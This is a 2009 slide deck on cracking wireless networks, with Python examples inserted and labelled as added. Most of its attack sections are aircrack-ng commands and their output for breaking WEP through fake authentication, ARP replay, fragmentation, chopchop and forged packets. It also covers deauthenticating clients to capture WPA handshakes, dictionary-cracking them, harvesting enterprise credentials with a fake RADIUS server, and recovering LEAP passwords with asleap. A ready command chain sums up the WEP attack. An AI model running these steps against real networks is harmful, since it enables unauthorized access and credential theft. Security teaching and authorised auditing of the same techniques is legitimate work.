Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
1. Special thanks to:
Milw0rm | str0ke paperwork released on 24/2/2009
AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
2. Contents
- Introduction
- Security of Wireless network
- Breaking the Simple Defenses
  - Mac Filtering
  - Discover Hidden SSID
  - Sniffing Information on the Air
- Get closer with cracking tool
  - Aircrack-ng suite
  - Decrypt packet with airdecap-ng
  - Decloak packet with airdecloak-ng
- Owned the WEP Key with Simple Technique (No Injection)
  - Capturing method
  - Cracking method
- Owned the WEP Key with Advanced Technique (With Inject Method)
  - Monitor Mode
  - Fake Authentication
  - ARP Replay Attack
  - Fragmentation Attack
  - Korek ChopChop Attack
  - Packetforge
  - ARP Request Replay with Interactive Attack
  - Cracking WEP key
- Conclusion steps for cracking WEP
- Owned the WPA-PSK / WPA2-PSK Key
- Exploiting Enterprise Wireless Connection (WPA-TLS/TTLS/PEAP)
- Exploiting CISCO LEAP
- References & Greetz to
- About Me / Questions
3. Introduction
This presentation introduces the practical techniques used by hackers to break wireless security.
You really need some basic knowledge of wireless operation to follow it.
8. Breaking the Simple Defenses
Discover Hidden SSID
- SSID broadcasting can be disabled in beacon frames ONLY.
- All other management frames (probe requests/responses, association and reassociation frames) contain the SSID of the network.
So… what can I do is…..
- Forge DISASSOCIATE frames to a station, seeming to come from the ACCESS POINT, so the station tries to reassociate (and sends the SSID).
- Reboot a client, so it reassociates when it initialises (if you have physical access to the equipment).
- RF jam (interfere with) a client so it tries to reassociate (and exposes the SSID).
- Install a fake Access Point near a client with a weak signal so it tries to roam (probe requests will be sent).
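An added example, not part of the original slides, that shows the point above in code: a small Python parser for 802.11 management frames that pulls the SSID element out of beacons, probe requests/responses and (re)association requests. The BSSID and client MAC are the ones that appear in the capture output later in the deck; the SSID "Workshop" and the frame contents are constructed. A beacon from a "hidden" network yields an empty SSID, while the client's association request yields the real name, which is why a defender should treat SSID hiding as cosmetic and rely on the encryption and authentication layers instead.

```python
"""Extracting the SSID from 802.11 management frames (constructed frames only)."""

# Management-frame subtypes that carry a tagged SSID element, mapped to the
# length of the fixed fields that sit between the 24-byte header and the IEs.
FIXED_FIELD_LEN = {
    0x0: 4,   # association request: capability(2) + listen interval(2)
    0x2: 10,  # reassociation request: capability(2) + listen interval(2) + current AP(6)
    0x4: 0,   # probe request: tagged parameters start immediately
    0x5: 12,  # probe response: timestamp(8) + beacon interval(2) + capability(2)
    0x8: 12,  # beacon: same fixed fields as a probe response
}
MGMT_HEADER_LEN = 24  # frame control(2) + duration(2) + addr1..3(18) + seq ctrl(2)
BSSID = bytes.fromhex("001b2f3dcbd6")   # AP MAC as shown in the deck's aireplay-ng output
CLIENT = bytes.fromhex("002127c00771")  # client MAC as shown in the deck's packetforge output


def ssid_from_mgmt_frame(frame: bytes):
    """Return (subtype, bssid, ssid) for a management frame with an SSID element,
    (subtype, bssid, None) if it has none, or None for frames of another type.
    A 'hidden' network shows ssid == b'' only in its beacons."""
    if len(frame) < MGMT_HEADER_LEN:
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0x3      # 0 = management
    subtype = (fc >> 4) & 0xF
    if ftype != 0 or subtype not in FIXED_FIELD_LEN:
        return None
    bssid = frame[16:22]         # addr3 carries the BSSID in these frames
    pos = MGMT_HEADER_LEN + FIXED_FIELD_LEN[subtype]
    while pos + 2 <= len(frame):           # tagged parameters: id(1) len(1) value
        eid, elen = frame[pos], frame[pos + 1]
        if eid == 0:                       # element ID 0 is the SSID
            return subtype, bssid, frame[pos + 2:pos + 2 + elen]
        pos += 2 + elen
    return subtype, bssid, None


def build_mgmt_frame(subtype: int, bssid: bytes, src: bytes, ssid: bytes) -> bytes:
    """Build a minimal management frame of the given subtype (constructed test data)."""
    fixed = {0x0: b"\x11\x04\x0a\x00",                  # capability + listen interval
             0x2: b"\x11\x04\x0a\x00" + bssid,          # ... + current AP
             0x4: b"",
             0x5: b"\x00" * 8 + b"\x64\x00\x11\x04",   # timestamp + interval + capability
             0x8: b"\x00" * 8 + b"\x64\x00\x11\x04"}[subtype]
    header = (bytes([subtype << 4, 0x00])  # type 0 (management), no flags
              + b"\x00\x00"                # duration
              + b"\xff" * 6                # addr1: broadcast
              + src + bssid                # addr2: transmitter, addr3: BSSID
              + b"\x00\x00")               # sequence control
    return header + fixed + bytes([0, len(ssid)]) + ssid


def resolve_hidden_ssids(frames):
    """Map BSSID -> SSID using only frames that actually carry the name, i.e. the
    probe/association traffic the slide says cannot hide it."""
    names = {}
    for f in frames:
        parsed = ssid_from_mgmt_frame(f)
        if parsed and parsed[2]:           # skip non-management frames and empty SSIDs
            names[parsed[1]] = parsed[2]
    return names


# Constructed sample: the AP beacons with an empty SSID, then a client's
# association request discloses the real name.
HIDDEN_BEACON = build_mgmt_frame(0x8, BSSID, BSSID, b"")
ASSOC_REQ = build_mgmt_frame(0x0, BSSID, CLIENT, b"Workshop")

if __name__ == "__main__":
    print(ssid_from_mgmt_frame(HIDDEN_BEACON))
    print(resolve_hidden_ssids([HIDDEN_BEACON, ASSOC_REQ]))
```

Feeding a real capture through the same parser (one frame per call) gives a defender a quick audit of which "hidden" networks are disclosed by their own clients.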
11. Get Closer with the Cracking Tool
Aircrack-ng suite
Aircrack-ng suite is a set of tools for auditing wireless networks.
4 main tools for today:
- Airodump-ng – used for capturing packets
- Aireplay-ng – used for injection:
  - De-authentication
  - Fake authentication
  - Interactive packet replay
  - ARP replay
  - KoreK Chopchop
  - Fragment
- Packetforge-ng – used for creating packets
- Aircrack-ng – used for recovering keys
12. Get Closer with the Cracking Tool
Decrypt packets with airdecap-ng
For WPA, airdecap-ng only returns a successful result for a file that contains the four-way handshake.
13. Get Closer with the Cracking Tool
Decloak packet with airdecloak-ng
Cloaking is a technique to disturb the WEP key cracking process.
It is done by injecting packets encrypted with random WEP keys into the network; these packets are called "chaff". If the attacker captures these packets and runs the cracking, the result will be wrong or no result will be returned.
However, the aircrack team has developed a tool to deal with this technique, called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command returns two files:
- workshop-01-filtered.cap: contains the filtered packets from the specified bssid
- workshop-01-cloaked.cap: contains the cloaked packets from the specified bssid
14. Get Closer with the Cracking Tool
Aircracking 101
PTW Attack
(-z) (aircrack-ng -z capture.cap). Only works for WEP 64/128 bits. Requires ARP request/reply packets, so you must dump all packets with airodump-ng.
Dictionary Attack
(WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)
Fudge Attack
(-f) Once you hit 2 million IVs, try the fudge factor with "-f 4". Retry, increasing the fudge factor by adding 4 to it each time. All the while, keep collecting data. Remember the golden rule: "The More IVs the Better".
16. Owned the WEP Key with Simple Technique (No Injection)
Let's assume that the network has high traffic, so we don't need to do all that injection stuff.
Preparation:
A device which supports monitor mode and can inject packets into the network.
My preparation:
5-year-old laptop – AMD Turion64 1.6GHz, 256MB DDR (still working harmoniously despite…)
Ubuntu Intrepid Ibex 8.10
Broadcom chipset running the legacy b43 driver.
18. Owned the WEP Key with Simple Technique (No Injection)
Cracking Method
#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of the target access point
The successful cracking result is as follows:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
19. Owned the WEP Key with Advanced Technique (With Inject Method)
Let's assume that the network has no traffic at all.
The requirements for a packet chosen for injection are as follows:
- The source MAC address is associated with the access point (we can do this by fake authentication).
- It is sent from a client to the access point (the "To DS" flag is set to 1).
- The destination MAC address is the broadcast address (FF:FF:FF:FF:FF:FF).
The well-known packet which meets all the requirements is the ARP request broadcast.
We can divide the injection technique into 2 scenarios:
- The network has ARP requests.
- The network has no ARP requests.
20. Owned the WEP Key with Advanced Technique (With Inject Method)
Monitor mode
Use airmon-ng to set your wifi card to Monitor Mode and prepare for packet injection.
#airmon-ng start wlan0 11
This sets wlan0 to Monitor mode on channel 11. We must specify the same channel as the target AP's channel.
21. Owned the WEP Key with Advanced Technique (With Inject Method)
Fake Authentication
We can do fake authentication with the following command:
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-a xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
If we get a successful result, our MAC address is associated with the particular access point.
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are facing and pick the appropriate steps to deal with it.
22. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Replay Attack
We can run the ARP replay attack with the following command:
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-b xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
Aireplay-ng will detect ARP requests and use them to perform the replay attack automatically.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
23. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
The fragmentation attack is used to obtain 1500 bytes of keystream, so we can use this keystream to create a packet of up to 1500 bytes. The command for the fragmentation attack is:
#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
24. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
25. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
We just have to answer yes
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
26. Owned the WEP Key with Advanced Technique (With Inject Method)
Korek ChopChop Attack
We are able to use the chopchop attack with this command:
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet for decrypting. We can choose any packet whose BSSID matches our target.
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
27. Owned the WEP Key with Advanced Technique (With Inject Method)
Korek ChopChop Attack
Just answer yes
-----------------------
Use this packet ? y
-----------------------
And then the system will do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
And so on ...
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
28. Owned the WEP Key with Advanced Technique (With Inject Method)
Packetforge
To create an encrypted packet from the PRGA (XOR file) obtained from the chopchop or fragmentation attack:
#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get an ARP request packet in the file named "arp".
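To make the fragmentation, chopchop and packetforge-ng steps above concrete, here is an added Python example (not from the slides or from the aircrack-ng project) of the WEP mechanics they rely on: RC4 keyed with IV||key, a CRC-32 ICV, keystream recovery from a frame whose plaintext is known (what the .xor file holds), and forging a new frame under the same IV from the keystream alone. The key 00:11:22:33:44 and the IV 55:bc:e6 are the values visible in the slides' output; the ARP payload is constructed. The ICV check in wep_decrypt is the per-frame test behind aircrack-ng's "Decrypted correctly: 100%" line. The defender's takeaway: once the keystream for one IV is known, both confidentiality and integrity for that IV are gone without the key ever being learned, so WEP cannot be hardened, only replaced.

```python
import struct
import zlib

# Sample values: the key is the one in the deck's aircrack-ng output and the IV
# is the one visible at offset 0x18 of the deck's chopchop dump; the payload
# (LLC/SNAP header + ARP who-has) is constructed. The fixed leading bytes of an
# ARP frame are what make it such a convenient known-plaintext packet.
WEP_KEY = bytes.fromhex("0011223344")
IV = bytes.fromhex("55bce6")
ARP_REQUEST = (bytes.fromhex("aaaa030000000806")        # LLC/SNAP, ethertype ARP
               + bytes.fromhex("0001080006040001")      # ARP header, opcode request
               + bytes.fromhex("002127c00771") + bytes([192, 168, 1, 50])   # sender
               + bytes(6) + bytes([192, 168, 1, 1]))                        # target


def rc4(key: bytes, n: int) -> bytes:
    """RC4 keystream of n bytes (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) | key index(1) | RC4(IV||key) over plaintext||ICV."""
    return iv + b"\x00" + xor(plaintext + icv(plaintext), rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, body: bytes):
    """Decrypt a body and verify its ICV; None on mismatch. This per-frame check
    is what aircrack-ng's 'Decrypted correctly: 100%' line reports."""
    iv, ct = body[:3], body[4:]
    pt = xor(ct, rc4(iv + key, len(ct)))
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


def keystream_from_known_plaintext(body: bytes, known: bytes) -> bytes:
    """Recover the PRGA bytes for this IV from a frame whose plaintext is known:
    ciphertext XOR (plaintext||ICV). This is the content of the .xor file that
    chopchop and the fragmentation attack produce, obtained here the easy way."""
    return xor(body[4:], known + icv(known))


def forge_with_keystream(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """packetforge-ng's job: encrypt a new payload under the same IV using only
    the keystream. No key is needed because the ICV is an unkeyed CRC-32."""
    if len(keystream) < len(plaintext) + 4:
        raise ValueError("keystream shorter than payload + ICV")
    return iv + b"\x00" + xor(plaintext + icv(plaintext), keystream)


if __name__ == "__main__":
    body = wep_encrypt(WEP_KEY, IV, ARP_REQUEST)
    ks = keystream_from_known_plaintext(body, ARP_REQUEST)
    forged = forge_with_keystream(IV, ks, ARP_REQUEST[:20])
    print(wep_decrypt(WEP_KEY, forged) == ARP_REQUEST[:20])
```

The length limit in forge_with_keystream is the reason the fragmentation attack above works so hard to reach 1500 bytes of keystream: a chopchop .xor file is only as long as the packet it was chopped from.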
29. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive Attack
We use aireplay-ng to inject the ARP request packet to the access point with the following command:
#aireplay-ng -2 -r arp rausb0
And…
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
30. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive Attack
Yes is the only option available
-----------------------
Use this packet ? y
-----------------------
Now aireplay-ng starts injecting the packets
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
And don’t forget to start airodump-ng
31. Owned the WEP Key with Advanced Technique (With Inject Method)
Cracking WEP Key
#aircrack-ng -z capture1-01.cap (PTW Attack)
The successful cracking result is as follows:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
32. Conclusion Scripts for Cracking WEP
$AP is the Access Point MAC Address
$WIFI is the WIFI Card MAC Address
airmon-ng start wlan0 11 (must specify the channel for Monitor Mode)
airodump-ng -c 11 -w capture1 wlan0 (-w takes a prefix; airodump-ng writes capture1-01.cap)
aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
aireplay-ng -4 -b $AP -h $WIFI wlan0
If it's not working, try: aireplay-ng -5 -b $AP -h $WIFI wlan0
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y replay.xor -w arp
aireplay-ng -2 -r arp wlan0
aircrack-ng -z capture1-01.cap
34. Owned the WPA-PSK/WPA2-PSK Key
We are able to do this by de-authenticating an associated client.
This forces the client to re-authenticate, and we can capture the four-way handshake from this process.
The command for de-authentication is:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
35. Owned the WPA-PSK/WPA2-PSK Key
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19
19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48
37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F
AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
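The three values in the output above (Master Key, Transcient Key, EAPOL HMAC) are the WPA key hierarchy. The added Python example below (not part of the slides or of aircrack-ng) derives them for a constructed four-way handshake and performs the check aircrack-ng runs for every wordlist entry. The AP and client MACs are the ones from the slides' dumps and the SSID is "Workshop" as in the output above; the nonces, the passphrase and the EAPOL frame are constructed. It shows why the captured handshake alone is enough for offline guessing and why the strength of the PSK is the only thing protecting a WPA-PSK network: each guess costs 4096 HMAC-SHA1 rounds and nothing more.

```python
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """'Master Key' in aircrack-ng's output: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """'Transcient Key' (PTK, 64 bytes): 802.11i PRF-512 over both MACs and both nonces.
    The first 16 bytes are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """'EAPOL HMAC': MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key-descriptor version 1 uses HMAC-MD5, version 2 HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with a zeroed MIC (constructed, not a real capture)."""
    body = (b"\x02"          # descriptor type: RSN
            + b"\x01\x0a"    # key info: MIC bit set, pairwise, descriptor version 2
            + b"\x00\x10"    # key length
            + bytes(8)       # replay counter
            + snonce
            + bytes(16)      # key IV
            + bytes(8)       # RSC
            + bytes(8)       # ID
            + bytes(16)      # MIC, filled in by make_sample_handshake
            + b"\x00\x00")   # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_sample_handshake(passphrase: str, ssid: str = "Workshop") -> dict:
    """What airodump-ng would have captured: AP and client MACs from the deck's
    dumps, constructed nonces, and message 2 carrying a genuine MIC."""
    hs = {"ssid": ssid,
          "aa": bytes.fromhex("001b2f3dcbd6"),    # AP MAC from the deck
          "spa": bytes.fromhex("002127c00771"),   # client MAC from the deck
          "anonce": bytes(range(32)),             # constructed
          "snonce": bytes(range(32, 64)),         # constructed
          "version": 2}
    frame = build_eapol_msg2(hs["snonce"])
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    mic = eapol_mic(kck, frame, hs["version"])
    hs["eapol"] = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return hs


def passphrase_matches(candidate: str, hs: dict) -> bool:
    """The test run per wordlist entry: passphrase -> PMK -> PTK -> KCK, then
    compare the recomputed MIC with the one in the captured frame."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]),
                               hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16])


if __name__ == "__main__":
    hs = make_sample_handshake("correct horse battery")
    print(passphrase_matches("correct horse battery", hs), passphrase_matches("Workshop", hs))
```

passphrase_matches is a pure function of the captured fields, so the same code doubles as a defensive check that a handshake captured during your own audit really belongs to the passphrase you expect.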
36. Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
Most companies have turned to public key encryption for their wireless networks and think it is perfectly safe.
But a tricky hacker can still attack this system by spoofing the certificate.
This attacking method takes advantage of client carelessness: many clients accept a certificate without considering whether it is genuine or not.
This lets the attacker impersonate the RADIUS server and capture login credential information from victims.
We can use freeradius as a fake RADIUS server, combined with the WPE patch, to log credential information on the freeradius server.
Additional information:
http://www.willhackforsushi.com/FreeRADIUS_WPE.html
37. Exploiting CISCO LEAP
Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys.
Cisco LEAP is one of the extensible authentication protocol (EAP) types specified by 802.1X.
We found that the usernames sent to RADIUS are plaintext (captured with Wireshark), but the password was encrypted.
So it's also vulnerable to exploit… (insert evil
38. Exploiting CISCO LEAP
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords.
asleap can perform:
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery); AIRJACK DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
39. Exploiting CISCO LEAP
First step: use genkeys (shipped with asleap) to produce the necessary database (.dat) and index (.idx) files
#./genkeys -r dictionary -f dict.dat -n dict.idx
dictionary = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index file (generated as a result of running this command)
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
40. Exploiting CISCO LEAP
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our pass+hash file (generated with genkeys, see above)
dict.idx = Our index file (generated with genkeys, see above)
41. Exploiting CISCO LEAP
So… what are we waiting for?
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
asleap 2.2 now includes the "-C" and "-R" options to specify the hex-delimited bytes for the challenge and the response (respectively).
Using these options, asleap becomes a generic MS-CHAPv2 cracking tool and can be applied any time you have an MS-CHAPv2 packet capture available.
42. References & Greetz to
PaulDotCom Forum
http://www.darkoperator.com/scripts
http://trac.metasploit.com/wiki/Karmetasploit
http://aircrack-ng.org/doku.php
http://www.citec.us
http://www.milw0rm.com
Greetz to the CWH Underground team:
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter,
Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
43. About Me / Questions
I’m Siddiq, 19.
Currently pursuing Degree in Biochemistry at
Technology Park Malaysia College.
A retarded lazy part-time web programmer @ I-
don’t-know-anything-about-IT
Currently looking for a real part-time job.
mysiddiq@gmail.com
Thanks for attending.
Questions?